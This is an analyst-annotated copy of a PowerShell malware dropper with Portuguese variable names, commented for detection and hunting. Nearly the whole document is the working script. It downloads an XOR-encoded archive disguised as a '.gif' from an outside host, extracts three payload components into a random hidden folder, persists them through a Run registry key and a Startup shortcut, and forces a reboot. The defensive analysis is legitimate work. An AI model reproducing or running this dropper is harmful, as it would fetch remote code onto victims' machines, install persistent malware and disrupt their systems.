# Analyst note: this paste is a PowerShell downloader/installer script. Its
# identifiers are Portuguese ("caminho" = path, "arquivo" = file,
# "caixa zipada" = zipped box, "pasta" = folder).
#
# Run-once marker: a file under %ALLUSERSPROFILE% whose name is produced by the
# .NET format string 'yyy2020.ini'. Presumably only "yyy" is a date specifier
# (the current year) and "2020.ini" is copied literally - confirm on a test host.
- $strCaminhoArquivoLog = "$env:ALLUSERSPROFILE\$([System.DateTime]::Now.ToString('yyy2020.ini'))"
# True when the marker file already exists. The install block further down is
# guarded by this flag, so the marker is a host indicator that the script has
# already run on this machine.
- $bExisteArquivoLog = [System.IO.File]::Exists($strCaminhoArquivoLog)
# gera-strrand N: returns a string of N random ASCII letters.
# Code points 65..90 (A-Z) and 97..122 (a-z) are piped to Get-Random -Count,
# each selected value is cast to [char], and -join concatenates the result.
# N is taken from $args[0]; the pool holds 52 letters.
# NOTE(review): Get-Random -Count samples from the input list, so a letter
# presumably does not repeat within one result - confirm.
# Detection relevance: every folder and file name built with this helper
# differs per run, so name-based indicators do not carry over between hosts.
- function gera-strrand
- {
- -join ((65..90) + (97..122) | Get-Random -Count $args[0] | % {[char]$_})
- }
# Install block: runs only when the marker file was absent. In order it
#   1. writes the marker, 2. creates a dot-prefixed staging folder in a user
#   profile directory, 3. downloads and XOR-decodes an archive, 4. extracts and
#   renames three files, 5. registers two logon persistence entries,
#   6. forces a reboot.
# The script never starts the extracted executable itself; it is only
# referenced by the persistence entries, so it would first run at the next
# logon. Process-tree detections therefore will not show PowerShell as the
# parent of the payload - correlate on the file, registry and .lnk writes.
- if (-Not $bExisteArquivoLog)
- {
# Create the run-once marker so later executions skip this block.
- "" | Set-Content $strCaminhoArquivoLog
# Staging folder name: "." followed by three random letters.
- $NomePasta = gera-strrand 3
- $Directory = "." + $NomePasta
# Candidate parent folders. Slots 0-3 are overwritten with the user's
# Documents, Music, Pictures and Templates paths; slot 4 keeps the integer 4.
- $array = (0..4)
- $array[0] = [environment]::getfolderpath("MyDocuments")
- $array[1] = [environment]::getfolderpath("MyMusic")
- $array[2] = [environment]::getfolderpath("MyPictures")
- $array[3] = [environment]::getfolderpath("Templates")
# Get-Random -Maximum 4 yields 0..3, so one of the four folders above is chosen.
# Hunting lead: a new ".xxx" directory directly under one of these locations.
- $Num = Get-Random -Maximum 4
- $strCaminhoPastaCaixa = $array[$Num] + "\" + $Directory + "\"
- New-Item -ItemType directory -Path $strCaminhoPastaCaixa
# Local download target: eight random letters with a ".zip" extension.
- $strCaminhoCaixaZipada = gera-strrand 8
- $strCaminhoCaixaZipada = "$strCaminhoPastaCaixa$strCaminhoCaixaZipada.zip"
# Network indicator: the remote resource carries a ".gif" extension but is
# saved locally as ".zip". The host and path below are the IoC to block or
# search for in proxy and DNS logs.
- $strUrlCaixaZipada = "https://fasts-hoping-ultra.cash/mdlins32/mdl32.gif"
# Plain WebClient download straight to disk.
- (New-Object System.Net.WebClient).DownloadFile($strUrlCaixaZipada, $strCaminhoCaixaZipada)
# Decode in place: every byte is XORed with the single key 0x91 and the file
# is rewritten. The content on the wire is therefore not a recognisable
# archive; content inspection has to apply the same XOR before type-matching.
- $objBytesCaixaZipada = [System.IO.File]::ReadAllBytes($strCaminhoCaixaZipada)
- for($i=0; $i -lt $objBytesCaixaZipada.count; $i++)
- {
- $objBytesCaixaZipada[$i] = $objBytesCaixaZipada[$i] -bxor 0x91
- }
- [System.IO.File]::WriteAllBytes($strCaminhoCaixaZipada,$objBytesCaixaZipada)
# Extraction through the Shell.Application COM object: each item in the decoded
# file is copied into the staging folder and its name is recorded.
# Presumably the decoded file is a ZIP archive, since NameSpace() opens it as a
# folder - confirm against a sample.
- $objArrayArqsZip = New-Object System.Collections.ArrayList
- $objShelApplication = New-Object -com shell.application
- $objArquivoZipado = $objShelApplication.NameSpace($strCaminhoCaixaZipada)
- foreach($item in $objArquivoZipado.items())
- {
- $objShelApplication.Namespace($strCaminhoPastaCaixa).copyhere($item)
- $objArrayArqsZip.Add($item.name)
- }
# Random final names for the three extracted files:
#   "DllKl" module : 7 letters + "." + 3-letter random extension
#   "Executor"     : 5 letters + ".exe"
#   "ScriptAutoIt" : 8 letters, no extension
# NOTE(review): the roles (DLL payload, interpreter executable, AutoIt script)
# are inferred from the variable names only - verify against the sample.
- $strNomeModuloDllKl = gera-strrand 7
- $strExtModuloDllKl = gera-strrand 3
- $strNomeModuloDllKl = $strNomeModuloDllKl + "." + $strExtModuloDllKl
- $strPathModuloDllKl = $strCaminhoPastaCaixa + $strNomeModuloDllKl
- $strNomeModuloExecutor = gera-strrand 5
- $strNomeModuloExecutor = $strNomeModuloExecutor + ".exe"
- $strPathModuloExecutor = $strCaminhoPastaCaixa + $strNomeModuloExecutor
- $strNomeScriptAutoIt = gera-strrand 8
- $strPathScriptAutoIt = $strCaminhoPastaCaixa + $strNomeScriptAutoIt
# Files are identified purely by size: under 2000 bytes becomes the script,
# under 1,000,000 bytes becomes the .exe, anything larger becomes the third
# module. These size bands are a triage aid when the random names are unknown.
- foreach ($element in $objArrayArqsZip)
- {
- $intTamArquivo = (Get-Item "$strCaminhoPastaCaixa$element").Length
- if ($intTamArquivo -lt 2000)
- {
- Rename-Item -Path "$strCaminhoPastaCaixa$element" -NewName $strPathScriptAutoIt
- }
- elseif ($intTamArquivo -lt 1000000)
- {
- Rename-Item -Path "$strCaminhoPastaCaixa$element" -NewName $strPathModuloExecutor
- }
- else
- {
- Rename-Item -Path "$strCaminhoPastaCaixa$element" -NewName $strPathModuloDllKl
- }
- }
# After a 5-second pause the decoded archive is deleted, leaving only the three
# renamed files in the staging folder.
- Start-Sleep -s 5
- Remove-Item -Path $strCaminhoCaixaZipada -Force
# Persistence 1: per-user Run key. The value data is three double-quoted paths
# (the .exe, then the script, then the third module); [char]34 is '"'.
# NOTE(review): $strUser is not assigned anywhere in the visible lines, so the
# value name cannot be determined from this page - hunt on the value data
# (a quoted .exe inside a dot-folder under Documents/Music/Pictures/Templates).
# NOTE(review): the string literal spans two lines in this paste; that may be a
# wrapping artefact of the page - confirm against the original sample.
- $registryPath = "HKCU:\Software\Microsoft\Windows\CurrentVersion\Run"
- $Name = $strUser
- $value = "$([char]34)$strPathModuloExecutor$([char]34) $([char]34)$strPathScriptAutoIt$([char]34)
- $([char]34)$strPathModuloDllKl$([char]34)"
# NOTE(review): New-Item -Force on a key that already exists may recreate it and
# drop its existing values; if so, missing legitimate Run entries are an
# additional forensic tell - confirm.
- New-Item -Path $registryPath -Force | Out-Null
- New-ItemProperty -Path $registryPath -Name $name -Value $value -Force | Out-Null
# Persistence 2: a shortcut in the user's Startup folder named
# "<username>.lnk". Target is the .exe, arguments are the script and module
# file names, working directory is the staging folder. It also sets the hotkey
# CTRL+SHIFT+F and icon index 29 from Shell32.dll. Description is assigned
# twice; the final value is 50 random letters.
- $strNomeLNK = $env:UserName
- $objShell = New-Object -ComObject ("WScript.Shell")
- $startup = [environment]::getfolderpath("Startup")
- $objShortCut = $objShell.CreateShortcut($startup + "\" + $strNomeLNK + ".lnk")
- $objShortCut.TargetPath = $strPathModuloExecutor
- $objShortCut.Description = $strNomeModuloExecutor
- $objShortCut.Arguments = "$strNomeScriptAutoIt $strNomeModuloDllKl"
- $objShortCut.WorkingDirectory = $strCaminhoPastaCaixa
- $objShortCut.Hotkey = "CTRL+SHIFT+F"
- $objShortCut.IconLocation = "Shell32.dll, 29";
- $objShortCut.Description = gera-strrand 50
- $objShortCut.Save()
# Reboot so the persistence entries fire at the next logon. -F is presumably
# shorthand for -Force - confirm. An unexpected restart shortly after a
# PowerShell download is itself a signal worth correlating.
- Restart-Computer -F
- }